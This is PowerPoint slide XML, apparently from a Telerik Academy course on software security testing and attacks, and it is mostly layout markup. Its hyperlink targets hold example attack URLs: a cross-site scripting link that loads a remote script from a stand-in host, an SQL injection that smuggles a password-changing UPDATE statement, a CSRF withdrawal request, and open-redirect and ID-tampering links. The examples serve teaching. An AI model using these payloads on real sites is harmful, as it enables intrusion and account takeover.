                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
              </a:rPr>
              <a:t>?</a:t>
            </a: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a:ln w="11430"/>
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="25400" algn="tl" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>?</a:t>
            </a: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a:t>Course web site URL</a:t>
            </a:r>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a:solidFill>
                  <a:srgbClr val="FFBF8B"/>
                </a:solidFill>
                <a:effectLst>
                  <a:reflection blurRad="6350" stA="55000" endA="300" endPos="45500" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
                </a:effectLst>
                <a:latin typeface="Cambria" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="847027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a:t>Presentation Title</a:t>
            </a:r>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27930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a:t>Presentation Title</a:t>
            </a:r>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Presentation Subtitle</a:t>
            </a:r>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a:t>Author Name</a:t>
            </a:r>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a:solidFill>
                  <a:srgbClr val="0EFE58"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Telerik Corporation</a:t>
            </a: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46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a:t>Slide Title</a:t>
            </a:r>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a:t>Source code box</a:t>
            </a:r>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a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" noProof="1"/>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25013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374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academy.telerik.com/"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sdn2.microsoft.com/en-us/library/ms978516.asp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www.san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owasp.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acunetix.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hyperlink" Target="http://www.wireshark.or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www.thc.or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maaaaz/thc-hydra-window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vulnerable.com/redirect.asp?=http://www.links.co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www.vulnerable.com/redirect.asp?=http:/www.facked.com/advisory/system_failure/password_recovery_syste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www.site.com/profile?userid=2249"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www.site.com/profile?userid=224"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oogle.com/webmasters/tools/removals-request?hl=en&amp;siteUrl=http://%7bYOUR_URL%7d/&amp;urlt=%7bURL_TO_BLOCK%7d"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jamesbreckenridge.co.uk/remove-any-site-from-google-even-if-you-dont-control-it.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hyperlink" Target="http://target/getdata.php?data=%3cscript%20src=%22http://www.badplace.com/nasty.js%22%3e%3c/script%3e"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target/login.asp?userid=bob';%20update%20logintable%20set%20passwd='0n3d';--%00"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bank.example.com/withdraw?account=bob&amp;amount=1000000&amp;for=mallory"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youtube.com/watch?v=P_u3g95bzIE"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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto4.wdp"/></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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto5.wdp"/></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92.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forums.academy.telerik.com/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image94.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.facebook.com/telerikacademy" TargetMode="External"/><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Vulnerability Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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28438" y="5288210"/>
            <a:ext cx="1357312" cy="943558"/>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2135" y="2286000"/>
            <a:ext cx="2133600" cy="164052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15"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hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://academy.telerik.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>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547640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Intended vs. Implemented</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="914400"/>
            <a:ext cx="8686800" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Intended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> vs. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>implemented</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> software behavior in applications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1026" name="Picture 2" descr="C:\Users\ogeorgiev\Desktop\Intended vs Cod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11636" y="1981200"/>
            <a:ext cx="4720728" cy="4608513"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5644"/>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98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Failures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the real world, software failures usually happen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>spontaneously</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Without intentional mischief</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Failures can be result of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Challenge/Prestige</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Curiosity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> driven</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Aiming to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Vandalizing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealing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0" y="4724400"/>
            <a:ext cx="2138756" cy="1593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63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solidFill>
                  <a:srgbClr val="CCFF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Testing in the Software Development Life Cycle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1295400"/>
            <a:ext cx="8686800" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software security testing includes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creating security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>abuse/misuse cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Listing normative security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Performing architectural </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>risk analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Building risk-based security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>test plans</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wielding static analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Performing security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>tests</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Performing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>penetration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>testing in the ﬁnal environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Cleaning up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>after security breaches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364519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solidFill>
                  <a:srgbClr val="CCFF33"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Testing in the Software Development Life Cycle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1219201"/>
            <a:ext cx="8686800" cy="5486399"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software Development Life Cycle,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With Security In Mind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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="5538569"/>
            <a:ext cx="7734300" cy="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39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4582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78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290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511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7000" y="5830669"/>
            <a:ext cx="1600200" cy="646331"/>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Requirements </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>and use cases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2006600" y="5969168"/>
            <a:ext cx="88900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Design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971800" y="5830669"/>
            <a:ext cx="889000" cy="646331"/>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Test plans</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="5969168"/>
            <a:ext cx="889000" cy="369332"/>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Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5867400" y="5830668"/>
            <a:ext cx="889000" cy="646331"/>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Test results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848600" y="5830669"/>
            <a:ext cx="1219200" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Field feedback</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323850" y="3969938"/>
            <a:ext cx="8001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Abuse </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>cases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3046966"/>
            <a:ext cx="16002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Security requirements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7943850" y="3944536"/>
            <a:ext cx="10287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Security breaks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2584450" y="2651370"/>
            <a:ext cx="139065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External review</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3562350" y="3972676"/>
            <a:ext cx="1600200" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Risk-based security tests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5111750" y="2836036"/>
            <a:ext cx="1225550" cy="923330"/>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Static </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>analysis (tools)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6134100" y="3944537"/>
            <a:ext cx="11430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a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1930400" y="4013493"/>
            <a:ext cx="10160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a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6858000" y="3119711"/>
            <a:ext cx="1447800" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Penetration testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Connector 33"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="27" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="4590867"/>
            <a:ext cx="152400" cy="85503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5" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="4616269"/>
            <a:ext cx="203200" cy="829628"/>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6" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1409700" y="3693297"/>
            <a:ext cx="0" cy="175260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2" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2197100" y="4659824"/>
            <a:ext cx="2413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2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="4659824"/>
            <a:ext cx="2921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8" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3279775" y="3297701"/>
            <a:ext cx="0" cy="2148196"/>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2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4191000" y="4619007"/>
            <a:ext cx="171450" cy="82689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2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5486400" y="3759366"/>
            <a:ext cx="238125" cy="168653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2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6705600" y="4590868"/>
            <a:ext cx="0" cy="855029"/>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3" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7581900" y="3766042"/>
            <a:ext cx="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3" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
